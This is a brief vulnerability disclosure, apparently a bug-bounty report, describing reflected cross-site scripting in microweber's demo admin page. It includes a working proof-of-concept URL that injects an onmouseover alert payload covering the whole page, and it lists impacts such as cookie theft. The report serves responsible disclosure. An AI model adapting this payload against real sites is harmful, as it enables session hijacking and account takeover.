Cross-site Scripting (XSS) - Reflected in microweber/microweber
Feb 19th 2022
Hi, The endpoint https://demo.microweber.org/demo/admin/page is vulnerable to Cross Site Scripting.
Proof of Concept
just navigate to the poc url: https://demo.microweber.org/demo/admin/page/8tojh1%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22yrr2n/edit
now move your mouse on the page, you will see a xss popup.
(login if site asks)
Cross site scripting attacks can lead to account takeover via cookie stealing, temporary site deface, redirecting users to attackers controlled sites etc.